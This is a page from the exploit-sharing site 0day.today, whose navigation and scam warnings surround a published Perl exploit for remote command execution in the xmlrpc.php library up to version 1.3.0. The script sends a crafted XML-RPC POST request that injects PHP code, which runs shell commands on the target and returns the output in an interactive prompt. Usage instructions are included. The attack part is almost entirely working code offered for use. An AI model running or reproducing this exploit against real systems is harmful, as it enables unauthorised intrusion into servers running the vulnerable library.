0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
xmlrpc.php Library <= 1.3.0 Remote Command Execute Exploit (2)
============================================================== xmlrpc.php Library <= 1.3.0 Remote Command Execute Exploit (2) ============================================================== #-------------------------------------------------------# # /| # # | | # # | | # # /\ ________| |___ # # / \ \_______ __/ # # / \|\_____ | | _ _ _ _ ()___ # # / /\ \ ___ \ | |<_> / | | | || \ || | | | # # / /__\ \| \ || | _ /__ |_ | | ||_/ || | |_| # # / ______ \ | || || | / | | | || \ || | | # # / / \ \ | || || | / |_ |_ |_|| \|| | \_| # # \_/ |\_/ | || || | ___ _ _ # # | | | || /| | | | | ||\/| # # \| \||/ \| | |_ |_|| | # # | | | || | # # | |_ | || | # # # # Original advisory by http://gulftech.org/ # # Exploit coded by dukenn (http://asteam.org) # # # #------------------------------------------------------- #!/usr/bin/perl use IO::Socket; print "XMLRPC remote commands execute exploit by dukenn (http://asteam.org)\n"; if ($ARGV[0] && $ARGV[1]) { $host = $ARGV[0]; $xml = $ARGV[1]; $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "connecterror\n"; while (1) { print '['.$host.']# '; $cmd = <STDIN>; chop($cmd); last if ($cmd eq 'exit'); $xmldata = "<?xml version=\"1.0\"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_\n';echo `".$cmd."`;echo '_end_';exit;/*</name></value></param></params></methodCall>"; print $sock "POST ".$xml." HTTP/1.1\n"; print $sock "Host: ".$host."\n"; print $sock "Content-Type: text/xml\n"; print $sock "Content-Length:".length($xmldata)."\n\n".$xmldata; $good=0; while ($ans = <$sock>) { if ($good == 1) { print "$ans"; } last if ($ans =~ /^_end_/); if ($ans =~ /^_begin_/) { $good = 1; } } if ($good==0) {print "Exploit Failed\n";exit();} } } else { print "Usage: perl xml.pl [host] [path_to_xmlrpc]\n\n"; print "Example: perl xml.pl target.com /script/xmlrpc.php\n"; exit; } # 0day.today [2024-06-26] #